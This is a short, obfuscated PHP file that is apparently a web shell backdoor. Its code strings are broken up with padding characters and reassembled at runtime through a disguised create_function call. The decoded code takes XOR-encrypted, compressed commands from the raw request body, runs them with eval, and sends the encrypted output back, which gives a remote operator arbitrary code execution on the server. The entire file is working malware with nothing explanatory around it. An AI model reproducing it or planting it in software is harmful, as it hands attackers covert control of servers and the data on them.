<?php
$u='{$j};}%C}return $o;}%C%Cif (@%Cpreg_%Cmatch("/$kh(%C.+)$kf/",@fi%Cle_g%Cet_co%Cnt';
$T='%Cents("%Cphp://inpu%Ct"%C),$m%C)==1) {@%Cob_sta%Crt();@e%Cval(@gzunco%Cmpres%Cs';
$Z='or($%Ci=0;$i<$l;){for(%C$j=0;(%C$j<$c&&$i<$%Cl);$j+%C+,$i++%C){$o.=%C$t{$%C%Ci}^%C$k';
$K='(@%Cx(@b%Case64%C_decode($m%C[1]),$k))%C);$o=@%Cob_%Cget_con%Cte%Cnts(%C);@ob_end_';
$A=str_replace('LI','','creLIaLIteLI_LILIfunctiLIon');
$R='cl%C%Cean();$r=@%Cbas%Ce64_encode(@%Cx(@%Cgzcom%Cpress($o),$k%C))%C;pri%Cn%Ct("$p$kh$r$kf");}';
$b='$k%C="098%Cf6bcd";$kh%C="4621d3%C73c%Cade";$kf%C="4e83262%C7%C%Cb4f6";$p="pkggtm%C%C';
$L='MitoK8eA77"%C;f%Cunction%C x%C(%C$t,$k){$c=strlen($%Ck);$%Cl=%Cst%Cr%C%Clen($t);$o="";f%C';
$G=str_replace('%C','',$b.$L.$Z.$u.$T.$K.$R);
$q=$A('',$G);$q();
?>
